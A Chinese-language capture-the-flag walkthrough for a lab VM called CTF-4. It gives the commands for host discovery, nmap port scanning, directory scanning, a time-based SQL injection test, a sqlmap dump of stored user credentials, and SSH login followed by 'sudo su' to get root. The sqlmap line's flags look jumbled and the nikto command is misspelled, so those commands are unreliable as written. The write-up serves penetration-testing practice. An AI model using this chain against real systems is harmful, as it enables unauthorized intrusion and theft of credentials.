CTF-4靶机教程

  • 修炼是一条永无止境的道路,从现在开始吧

环境准备

VMware 虚拟机
Kali Linux IP:192.168.217.154

主机发现

arp-scan -l
fping -ag 192.168.217.0/24

CTF-4靶机教程_第1张图片

端口扫描

nmap -A -sS -sV -v -p- 192.168.217.152
A 尽可能详细探测 同时探测服务版本和操作系统
sS 半开放扫描 (速度快,隐蔽性好)
sV 进行服务版本探测
v 详细地输出报告
-p- 对所有端口进行扫描

CTF-4靶机教程_第2张图片

目录扫描

dirb http://192.168.217.152
nitko -h 192.168.217.152

CTF-4靶机教程_第3张图片
对网页进行大概的浏览,寻找是否存在可疑的漏洞

CTF-4靶机教程_第4张图片
通过SQL的时间盲注 and sleep(5),判断该位置存在注入点,接着用sqlmap进行接下来的注入

sqlmap -u "192.168.217.152/index.html?page=blog&title=Blog&id=5" -Dehks --tables user --columns user_name,user_pass --dump

CTF-4靶机教程_第5张图片

ssh利用

尝试利用获取到的账号进行ssh登录,这里使用achen的账号密码
然后通过sudo su进行用户提权

ssh achen@192.168.217.152
sudo su

CTF-4靶机教程_第6张图片

你可能感兴趣的:(CTF-4靶机教程)